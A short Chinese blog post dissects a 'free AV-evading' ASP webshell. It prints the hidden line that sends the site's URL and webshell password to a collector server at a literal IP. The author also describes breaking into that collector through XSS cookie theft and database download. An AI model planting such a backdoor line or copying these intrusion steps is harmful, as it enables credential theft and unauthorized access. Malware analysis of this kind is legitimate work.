前因:
在群内看到有人分享免杀木马
第一感觉哪有这种好事,于是下载下来开始分析
用编辑器打开开始读代码
我们可以看到第三行代码如下:
代码为: UserPass="admin123" '密码
一般WEB端后门大多都是会发送当前webshell地址+密码然后到webshell箱子,直接跟随UserPass变量
代码内容为: j"<script src=""http://121.50.168.146:8080/api.asp?url="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>"
后门地址为: http://121.50.168.146:8080/
接收参数就是当前URL地址+密码,直接GET传输到api.asp
后门是早已泛滥的孤狼webshell箱子系统。
此箱子存在各种xss漏洞,随便插一下拿到cookie就可以进后台。但是我们不需要这么麻烦。
直接下载数据库,然后爆菊花,后台管理账户密码如下:
webshell箱子数据如下:
欢迎吐槽 路人甲:妈蛋好歹后门地址接收的加密一下啊!
路人乙:LOW B后门,被搞是迟早的事情。
文章出处:全球被黑站点统计
|